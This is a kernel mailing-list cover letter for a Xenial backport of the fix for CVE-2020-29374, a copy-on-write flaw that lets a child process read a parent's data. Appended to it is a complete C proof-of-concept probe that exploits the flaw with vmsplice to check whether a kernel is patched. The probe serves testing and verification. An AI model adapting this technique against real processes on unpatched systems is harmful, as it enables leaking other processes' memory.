[SRU Xenial 0/1] CVE-2020-29374

Thadeu Lima de Souza Cascardo cascardo at canonical.com
Thu Dec 17 17:06:20 UTC 2020


[Impact]
A child process can read CoW data from a parent. This is the first part of the
writeup at https://bugs.chromium.org/p/project-zero/issues/detail?id=2045.

[Test case]
The code from the Project Zero writeup was the one tested. It was adapted so that the
shared data was read in the child before calling get_user_pages_fast, so that the
fast path would be taken and the fast path on s390x could be tested.

[Backport]
There were conflicts, which were fixed, and FOLL_PIN does not exist on bionic.
Also, s390x and x86 still had their own GUPF implementations in 4.4, so they
needed to carry a fix of their own based on the generic one.

[Potential regression]
This could break users of GUP and hugepages.

[Tests]
This was tested with and without touching the data before vmsplice, on amd64,
i386, s390x and ppc64el.

Linus Torvalds (1):
  gup: document and work around "COW can break either way" issue

 arch/s390/mm/gup.c                      |  9 ++++-
 drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
 mm/gup.c                                | 44 +++++++++++++++++++++----
 mm/huge_memory.c                        |  7 ++--
 4 files changed, 57 insertions(+), 11 deletions(-)

-- 
2.27.0
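The scenario the cover letter's [Impact] and [Test case] sections refer to, as an added example: this is not the cover letter's test code, not Canonical's, and not the Project Zero proof of concept the author says he ran. It is a Linux user-space probe for the CoW bug behind CVE-2020-29374. The ordering it uses (child pins the page with vmsplice, drops its own mapping, then the parent writes) is the editor's reconstruction of the mechanism the backported fix addresses, not necessarily the ordering of the Project Zero code; the touch_first flag mirrors the "touching of data before vmsplice" variant the author tested so that get_user_pages_fast takes its fast path. Function names, the marker strings and the exit-code convention are this example's own.

```c
/*
 * Added example (not code from this cover letter or the Project Zero report):
 * a Linux user-space probe for the CoW bug behind CVE-2020-29374.  Parent puts
 * a marker in a private anonymous page and forks; the child pins the page into
 * a pipe with vmsplice() (get_user_pages underneath), optionally after reading
 * it so the PTE is present and get_user_pages_fast() takes its fast path, then
 * munmap()s it; the parent overwrites the page and the child reads the pipe.
 * On an unfixed kernel the parent's write reuses the pinned page, so the child
 * sees the post-fork marker.  Names and markers are this example's own.
 */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/uio.h>
#include <sys/wait.h>

#define DATA_BEFORE_FORK "parent-data-before-fork"  /* constructed markers */
#define DATA_AFTER_FORK  "parent-data-after-fork"

enum cow_probe_result {
    COW_PROBE_ERROR  = -1,  /* a syscall failed or the data was unrecognised */
    COW_PROBE_CLEAN  =  0,  /* child read the pre-fork marker: kernel is fixed */
    COW_PROBE_LEAKED =  1,  /* child read the parent's post-fork marker */
};

/* Map what the child read out of the pipe to a probe result. */
enum cow_probe_result classify_pipe_data(const char *buf)
{
    if (strcmp(buf, DATA_AFTER_FORK) == 0) return COW_PROBE_LEAKED;
    if (strcmp(buf, DATA_BEFORE_FORK) == 0) return COW_PROBE_CLEAN;
    return COW_PROBE_ERROR;
}

/* vmsplice(2) via syscall(2): the kernel pins the page with get_user_pages. */
static long vmsplice_page(int pipe_wr, void *page, size_t len)
{
    struct iovec iov = { .iov_base = page, .iov_len = len };
    return syscall(SYS_vmsplice, pipe_wr, &iov, 1UL, 0UL);
}

/* Child side.  Exit status is the probe result + 1 (0 = error). */
static int child_side(char *page, size_t page_sz, int data_rd, int data_wr,
                      int pinned_wr, int written_rd, int touch_first)
{
    char buf[64]; ssize_t n;
    if (touch_first) {
        volatile char sink = page[0];    /* PTE present: GUP fast path */
        (void)sink;
    }
    if (vmsplice_page(data_wr, page, page_sz) != (long)page_sz ||
        munmap(page, page_sz) != 0 ||    /* parent is now the only mapper */
        write(pinned_wr, "p", 1) != 1 || /* ask the parent to write */
        read(written_rd, buf, 1) != 1)   /* parent has overwritten the page */
        return 0;
    n = read(data_rd, buf, sizeof buf - 1);
    if (n <= 0) return 0;
    buf[n] = '\0';
    return (int)classify_pipe_data(buf) + 1;
}

/* Parent side: one probe run; touch_first selects the fast-GUP variant. */
enum cow_probe_result run_cow_probe(int touch_first)
{
    size_t page_sz = (size_t)sysconf(_SC_PAGESIZE);
    int data[2], pinned[2], written[2], status;
    enum cow_probe_result res = COW_PROBE_ERROR;
    char c; pid_t pid;
    char *page = mmap(NULL, page_sz, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED || pipe(data) || pipe(pinned) || pipe(written))
        return COW_PROBE_ERROR;
    strcpy(page, DATA_BEFORE_FORK);      /* CoW-shared with the child on fork */
    pid = fork();
    if (pid == 0)
        _exit(child_side(page, page_sz, data[0], data[1], pinned[1], written[0], touch_first));
    close(data[0]); close(data[1]); close(pinned[1]); close(written[0]);
    if (pid > 0 && read(pinned[0], &c, 1) == 1) {
        strcpy(page, DATA_AFTER_FORK);   /* write fault on the pinned page */
        if (write(written[1], "w", 1) != 1) perror("write");
    }
    close(written[1]);                   /* EOF unblocks the child on error */
    close(pinned[0]);
    if (pid > 0 && waitpid(pid, &status, 0) == pid && WIFEXITED(status) &&
        WEXITSTATUS(status) <= 2)
        res = (enum cow_probe_result)(WEXITSTATUS(status) - 1);
    munmap(page, page_sz);
    return res;
}

int main(void)
{
    static const char *const names[] = { "error", "clean", "leaked" };
    for (int t = 0; t <= 1; t++)
        printf("touch_first=%d: %s\n", t, names[run_cow_probe(t) + 1]);
    return 0;
}
```

On a kernel carrying this series (or upstream's later page_count-based CoW reuse) both runs report "clean", because the child's GUP either breaks CoW up front and pins a private copy, or the parent's write copies instead of reusing the pinned page. "leaked" means the parent's post-fork write landed in the page the child still holds through the pipe. "error" covers platforms where fork, vmsplice or the pipe plumbing is unavailable, so the probe never claims a result it did not observe.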



